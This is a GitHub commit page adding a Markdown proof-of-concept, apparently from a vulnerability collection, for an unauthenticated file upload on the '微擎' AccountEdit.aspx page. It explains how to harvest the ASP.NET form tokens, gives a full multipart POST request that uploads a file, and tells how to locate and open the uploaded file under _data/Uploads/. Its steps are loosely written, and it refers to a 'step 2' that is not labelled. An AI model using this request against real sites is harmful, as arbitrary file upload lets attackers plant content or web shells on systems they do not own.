Create 微擎-AccountEdit-file-upload文件上传漏洞.md

This commit is contained in:
wy876 2024-05-13 19:11:47 +08:00 committed by GitHub
parent cd613d9f45
commit fce8a83115
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,41 @@
## 微擎-AccountEdit-file-upload文件上传漏洞
1、访问/User/AccountEdit.aspx查看源代码搜索__VIEWSTATE" value=" 和__EVENTVALIDATION" value="这两个字符串,记录下来
## poc
```
POST /User/AccountEdit.aspx HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------8448979704593935221298734076
-----------------------------8448979704593935221298734076
Content-Disposition: form-data; name="__VIEWSTATE"
{VIEWSTATE}
-----------------------------8448979704593935221298734076
Content-Disposition: form-data; name="__EVENTVALIDATION"
{EVENTVALIDATION}
-----------------------------8448979704593935221298734076
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="111.txt"
Content-Type: text/plain
1233311
-----------------------------8448979704593935221298734076
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
上传图片
-----------------------------8448979704593935221298734076
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
-----------------------------8448979704593935221298734076
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
-----------------------------8448979704593935221298734076--
```
文件路径在第2步的响应里面搜索字符_data/Uploads/ 即可找到然后直接url+/_data/Uploads/{filepath}访问即可。